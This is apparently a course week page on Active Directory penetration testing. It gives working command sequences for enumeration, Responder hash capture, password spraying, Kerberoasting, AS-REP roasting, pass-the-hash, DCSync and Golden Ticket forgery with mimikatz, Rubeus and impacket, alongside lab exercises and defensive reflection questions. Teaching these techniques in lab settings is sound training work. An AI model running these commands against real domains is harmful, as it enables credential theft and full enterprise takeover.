CSY202 Week 10 Intermediate

Practice AD attacks before moving to reading resources.

Applied Cryptography

Track your progress through this week's content

Opening Framing: The Crown Jewels

Active Directory (AD) manages authentication and authorization for most enterprise Windows environments. It controls who can access what across thousands of computers and users. Domain Administrators have unrestricted access to every system.

For attackers, AD is the ultimate target. Compromise a Domain Admin account and you own the entire organization. For pentesters, demonstrating AD compromise shows maximum impact.

This week covers Active Directory fundamentals, enumeration, common attack paths, and the journey from domain user to Domain Admin.

Key insight: Most enterprise breaches end with AD compromise. Understanding AD attacks is essential for both offense and defense.

1) Active Directory Fundamentals

Understanding AD architecture: 

Active Directory Components:

Domain:
- Logical grouping of objects
- Users, computers, groups
- Shares common database
- Example: corp.company.com

Domain Controller (DC):
- Server that hosts AD
- Authenticates users
- Enforces policies
- Replicates with other DCs

Forest:
- Collection of domains
- Trust relationships
- Shared schema and config

Organizational Units (OUs):
- Containers for organizing objects
- Apply Group Policies
- Delegate administration

Objects:
- Users, computers, groups
- Each has attributes
- Identified by SID

Kerberos Authentication: 

Kerberos Flow:

1. User logs in
   → Sends request to Domain Controller (KDC)

2. AS-REQ/AS-REP (Authentication Service)
   → User proves identity
   → Receives TGT (Ticket Granting Ticket)

3. TGS-REQ/TGS-REP (Ticket Granting Service)
   → User presents TGT
   → Requests access to specific service
   → Receives Service Ticket

4. Service Access
   → User presents Service Ticket
   → Service grants access

Key concepts:
- TGT: Proves you authenticated
- Service Ticket: Proves you can access service
- Tickets have expiration
- Tickets can be stolen/forged (attacks!)

┌──────┐     AS-REQ      ┌──────┐
│ User │ ───────────────→│  DC  │
│      │←─── TGT ────────│ (KDC)│
│      │                 │      │
│      │    TGS-REQ      │      │
│      │ ───────────────→│      │
│      │←─ Svc Ticket ───│      │
└──────┘                 └──────┘
    │
    │    Service Ticket
    ↓
┌──────┐
│Server│
└──────┘

NTLM Authentication: 

NTLM (older, still used):

1. User sends username
2. Server sends challenge
3. User encrypts challenge with password hash
4. Server verifies

Why NTLM matters:
- Still widely used
- Hash can be captured and cracked
- Pass-the-Hash attacks possible
- NetNTLMv2 captured via Responder

Key insight: Kerberos and NTLM authentication mechanisms have weaknesses that enable powerful attacks.

2) AD Enumeration

Mapping the domain before attacking: 

Initial Enumeration:

# From domain-joined Windows machine:

# Current domain info
echo %userdomain%
echo %logonserver%
systeminfo | findstr /B "Domain"

# Domain Controller
nltest /dclist:domain.local
nslookup -type=srv _ldap._tcp.dc._msdcs.domain.local

# Current user context
whoami /all
net user %username% /domain

# Domain users
net user /domain
net user administrator /domain

# Domain groups
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

# Domain computers
net view /domain
net group "Domain Computers" /domain

PowerView Enumeration: 

# PowerView - PowerShell AD enumeration
# https://github.com/PowerShellMafia/PowerSploit

Import-Module .\PowerView.ps1

# Domain info
Get-Domain
Get-DomainController

# Users
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -Properties samaccountname,description

# Groups
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

# Computers
Get-DomainComputer
Get-DomainComputer -Properties dnshostname,operatingsystem

# Find interesting ACLs
Find-InterestingDomainAcl

# Find local admins on machines
Find-LocalAdminAccess

# Find where domain admins are logged in
Find-DomainUserLocation

# Find shares
Find-DomainShare -CheckShareAccess

BloodHound - Attack Path Mapping: 

# BloodHound visualizes AD attack paths

# 1. Collect data with SharpHound
.\SharpHound.exe -c all
# Creates .zip file with JSON data

# 2. Start BloodHound
sudo neo4j start
bloodhound

# 3. Import data
# Drag and drop .zip file

# 4. Run queries:
# - Find all Domain Admins
# - Shortest path to Domain Admin
# - Find Kerberoastable users
# - Find AS-REP roastable users
# - Find computers with unconstrained delegation

# Key paths to look for:
# - Users with admin rights on machines
# - Users with DCSync rights
# - Paths through group membership
# - Paths through ACL abuse

LDAP Enumeration: 

# From Linux with credentials:

# ldapsearch
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' -b "dc=domain,dc=local" "(objectClass=user)"

# ldapdomaindump
ldapdomaindump -u 'domain\user' -p 'password' dc.domain.local

# windapsearch
./windapsearch.py -d domain.local -u user -p password --dc-ip 192.168.1.1 -U
./windapsearch.py -d domain.local -u user -p password --dc-ip 192.168.1.1 --da

Key insight: Enumeration reveals attack paths. BloodHound especially shows routes to Domain Admin you might miss manually.

3) Initial Access and Credential Attacks

Getting that first foothold in AD:

LLMNR/NBT-NS Poisoning: 

# Responder captures NetNTLMv2 hashes

# When user mistypes share name:
\\fileservrr\share
# Windows broadcasts LLMNR/NBT-NS request
# Attacker responds: "I'm that server!"
# User sends credentials

# Run Responder
sudo responder -I eth0 -wrf

# Captured hashes appear in console and logs
# /usr/share/responder/logs/

# Crack with hashcat
hashcat -m 5600 hash.txt wordlist.txt

# Or relay with ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support

Password Spraying: 

# Try common passwords against many users

# Get user list first
Get-DomainUser | select samaccountname > users.txt

# Common spray passwords:
# Season + Year: Summer2024!
# Company + numbers: Acme2024!
# Welcome patterns: Welcome1!

# With crackmapexec
crackmapexec smb dc.domain.local -u users.txt -p 'Summer2024!' --continue-on-success

# With kerbrute (faster, uses Kerberos)
./kerbrute passwordspray -d domain.local users.txt 'Summer2024!'

# Check password policy first!
net accounts /domain
# Note lockout threshold and duration

AS-REP Roasting: 

# Attack users without Kerberos pre-auth

# Find vulnerable users
Get-DomainUser -PreauthNotRequired

# Request AS-REP (no password needed!)
# With Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# With GetNPUsers.py (from Linux)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

# Crack the hash
hashcat -m 18200 asrep.txt wordlist.txt

Kerberoasting: 

# Attack service accounts

# Service accounts have SPNs (Service Principal Names)
# Anyone can request service tickets
# Tickets encrypted with service account password
# Crack offline!

# Find Kerberoastable accounts
Get-DomainUser -SPN

# Request tickets with Rubeus
.\Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast.txt

# With GetUserSPNs.py (from Linux)
GetUserSPNs.py domain.local/user:password -request -outputfile kerberoast.txt

# Crack the hash
hashcat -m 13100 kerberoast.txt wordlist.txt

# Service accounts often have weak passwords
# Or never-changed passwords

Key insight: Kerberoasting and AS-REP roasting are powerful because they don't require special access—any domain user can do them.

4) Lateral Movement in AD

Moving through the domain:

Pass-the-Hash: 

# Use NTLM hash instead of password

# Dump hashes (if local admin)
mimikatz > sekurlsa::logonpasswords

# Pass-the-Hash with various tools:

# crackmapexec
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:hash

# psexec.py
psexec.py -hashes :hash domain/administrator@target

# evil-winrm
evil-winrm -i target -u administrator -H hash

# wmiexec.py
wmiexec.py -hashes :hash domain/administrator@target

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd

Pass-the-Ticket: 

# Use Kerberos tickets instead of password

# Export tickets from memory
mimikatz > sekurlsa::tickets /export

# Or with Rubeus
.\Rubeus.exe dump

# Import ticket
mimikatz > kerberos::ptt ticket.kirbi
.\Rubeus.exe ptt /ticket:base64ticket

# Now use Kerberos auth to access resources
dir \\server\share

Overpass-the-Hash: 

# Use NTLM hash to get Kerberos ticket

# With Mimikatz
sekurlsa::pth /user:admin /domain:domain.local /ntlm:hash /run:powershell

# This spawns process with Kerberos ticket
# Now can access Kerberos-only resources

# With Rubeus
.\Rubeus.exe asktgt /user:admin /rc4:hash /ptt

Remote Execution Methods: 

# Various ways to execute on remote systems:

# PSExec (creates service)
psexec.py domain/admin:password@target

# WMI (uses WMI)
wmiexec.py domain/admin:password@target

# SMBExec (uses services)
smbexec.py domain/admin:password@target

# WinRM (uses Windows Remote Management)
evil-winrm -i target -u admin -p password

# DCOM (uses DCOM)
dcomexec.py domain/admin:password@target

# Each has different detection signatures
# Each requires different ports/services

Key insight: Captured credentials enable movement throughout the domain. One admin hash can unlock many systems.

5) Domain Privilege Escalation

From domain user to Domain Admin:

ACL Abuse: 

# Active Directory permissions can be exploited

# Common dangerous permissions:
# - GenericAll: Full control
# - GenericWrite: Modify attributes
# - WriteOwner: Take ownership
# - WriteDACL: Modify permissions
# - ForceChangePassword: Reset password

# Find with PowerView
Find-InterestingDomainAcl -ResolveGUIDs

# Or BloodHound queries

# Example: User has GenericAll on another user
# Reset their password!
net user targetuser NewPassword123! /domain

# Example: User has GenericWrite on group
# Add yourself to group!
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker

Unconstrained Delegation: 

# Computers with unconstrained delegation
# Cache TGTs of users who connect

# Find delegation computers
Get-DomainComputer -Unconstrained

# If you compromise such a computer:
# Wait for Domain Admin to connect
# Their TGT is cached
# Extract and use it

# Extract with Mimikatz
sekurlsa::tickets /export

# Or coerce authentication with PrinterBug/PetitPotam
SpoolSample.exe DC.domain.local AttackerMachine.domain.local

DCSync Attack: 

# Replicate credentials from Domain Controller
# Requires: Replicating Directory Changes rights
# Domain Admins have this by default

# With Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:administrator

# With secretsdump.py
secretsdump.py domain/admin:password@dc.domain.local

# Gets NTLM hashes of any user
# Including krbtgt (for Golden Ticket)

Golden Ticket: 

# Forge TGT valid for any user

# Need:
# - krbtgt NTLM hash (from DCSync)
# - Domain SID
# - Domain name

# Get domain SID
Get-DomainSID

# Create Golden Ticket with Mimikatz
kerberos::golden /user:FakeAdmin /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Now you're Domain Admin!
# Valid for 10 years by default
# Survives password resets (except krbtgt)

# With ticketer.py
ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-... -domain domain.local FakeAdmin

Key insight: DCSync and Golden Ticket are endgame attacks. Once you have krbtgt hash, you own the domain permanently.

Real-World Context: AD Attacks in Practice

Professional considerations for AD attacks:

Detection: AD attacks are increasingly detected. Kerberoasting, DCSync, and Golden Tickets all have detection signatures. Modern SOCs watch for these. In red team engagements, stealth matters.

Domain Controller Access: Touching DCs directly is risky and often unnecessary. DCSync can be done remotely. Avoid RDP to DCs if possible.

Persistence: Golden Tickets persist until krbtgt password is reset twice. This is the ultimate persistence mechanism in AD.

MITRE ATT&CK Mapping:

  • T1558 - Steal or Forge Kerberos Tickets: Golden/Silver Tickets
  • T1550 - Use Alternate Authentication Material: Pass-the-Hash/Ticket
  • T1003.006 - DCSync: Credential dumping via replication
  • T1557 - LLMNR/NBT-NS Poisoning: Responder attacks

Key insight: AD attacks demonstrate enterprise-wide impact. A single compromised user can lead to complete domain takeover.

Guided Lab: AD Attack Simulation

Simulate AD attacks (requires AD lab environment).

Lab Environment Options

# Building an AD lab:

Option 1: Local VMs
- Windows Server 2019 (Domain Controller)
- Windows 10 (workstation, domain-joined)
- Kali Linux (attacker)

Option 2: Cloud/Pre-built
- DVAD (Damn Vulnerable AD)
- GOAD (Game of Active Directory)
- Detection Lab by Chris Long

Option 3: Online platforms
- HackTheBox Pro Labs
- TryHackMe AD rooms
- PentesterLab

Step 1: Enumeration

# If you have AD access:

# Basic enumeration
net user /domain
net group "Domain Admins" /domain

# PowerView
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainUser
Get-DomainGroup -Identity "Domain Admins"
Find-LocalAdminAccess

Step 2: Kerberoasting

# Find SPN accounts
Get-DomainUser -SPN

# Request tickets
.\Rubeus.exe kerberoast /format:hashcat

# Crack offline
hashcat -m 13100 kerberoast.txt wordlist.txt

Step 3: Lateral Movement

# With captured credentials:
crackmapexec smb targets -u user -p password

# Check for admin access
crackmapexec smb targets -u user -p password --local-auth

# Execute if admin
psexec.py domain/user:password@target

Step 4: Domain Escalation

# If Domain Admin achieved:
secretsdump.py domain/admin:password@dc

# Extract krbtgt hash
# Create Golden Ticket for persistence

Reflection (mandatory)

  1. What was the attack path from user to Domain Admin?
  2. Which techniques would be detected by a SOC?
  3. How would you defend against these attacks?
  4. What surprised you about AD security?

Week 10 Outcome Check

By the end of this week, you should be able to:

Next week: Wireless and Network Attacks—beyond the wire.

🎯 Hands-On Labs (Free & Essential)

Practice AD attacks before moving to reading resources.

🎮 TryHackMe: Active Directory Basics

What you'll do: Learn AD fundamentals and environment structure.
Why it matters: You need AD context before running attacks.
Time estimate: 1.5-2 hours

Start TryHackMe AD Basics →

🎮 TryHackMe: Attacktive Directory

What you'll do: Enumerate AD, exploit misconfigs, and escalate privileges.
Why it matters: This is a full AD attack chain lab.
Time estimate: 2-3 hours

Start TryHackMe Attacktive Directory →

🎮 TryHackMe: BloodHound

What you'll do: Visualize privilege paths and find attack routes.
Why it matters: BloodHound is the standard for AD pathing.
Time estimate: 1-2 hours

Start TryHackMe BloodHound →

🛡️ Lab: Explore NIST Post-Quantum Crypto

What you'll do: Review NIST PQC candidates and summarize enterprise impact.
Deliverable: One-page summary of 2 algorithms and migration considerations.
Why it matters: Enterprise auth stacks will shift as PQC matures.
Time estimate: 45-60 minutes

💡 Lab Tip: Document the full attack path from user to domain admin in one diagram.

🛡️ Modern Cryptography Outlook

Enterprise identity systems depend on cryptography. As post-quantum algorithms mature, attackers and defenders will adapt. 

Emerging focus areas:
- Post-quantum key exchange
- Hybrid TLS deployments
- Long-term certificate agility
- Migration planning and crypto inventories

📚 Building on CSY101 Week-14: Tie crypto agility to governance and risk planning.

Resources

Complete the required resources to build your foundation.

Lab: Active Directory Attack Path

Goal: Map and exploit attack paths in an AD environment.

Part 1: Build or Access AD Lab

  1. Set up local AD lab, or
  2. Use online platform (TryHackMe, HackTheBox)
  3. Document your lab environment

Part 2: Enumeration

  1. Run SharpHound and import to BloodHound
  2. Identify all Domain Admins
  3. Find shortest path to Domain Admin
  4. Identify Kerberoastable accounts
  5. Document interesting findings

Part 3: Initial Compromise

  1. Attempt Kerberoasting
  2. Attempt AS-REP roasting
  3. Crack any captured hashes
  4. Document credentials obtained

Part 4: Privilege Escalation

  1. Use credentials for lateral movement
  2. Identify path to Domain Admin
  3. Execute privilege escalation
  4. Demonstrate Domain Admin access

Part 5: Documentation

  1. Create attack path diagram
  2. Document each step with evidence
  3. Provide defensive recommendations

Deliverable (submit):

Checkpoint Questions

  1. What is the difference between NTLM and Kerberos authentication?
  2. What is Kerberoasting and why is it effective?
  3. What is a TGT and how is it used?
  4. What is Pass-the-Hash and when can it be used?
  5. What is DCSync and what rights does it require?
  6. What is a Golden Ticket and why is it significant?

Week 10 Quiz

Test your understanding of Active Directory attacks, Kerberos authentication, and domain escalation.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Weekly Reflection

Reflection Prompt (200-300 words):

This week you learned Active Directory attacks—techniques that can lead to complete enterprise compromise. You explored authentication weaknesses and privilege escalation paths.

Reflect on these questions:

A strong reflection will connect attack techniques to defensive strategies and organizational practices.

Verified Resources & Videos

Active Directory attacks are often the path to complete enterprise compromise. The techniques you've learned are used in real-world breaches daily. Understanding them from both offensive and defensive perspectives is essential for any security professional. Next week: wireless and network attacks.

← Previous: Week 09 Next: Week 11 →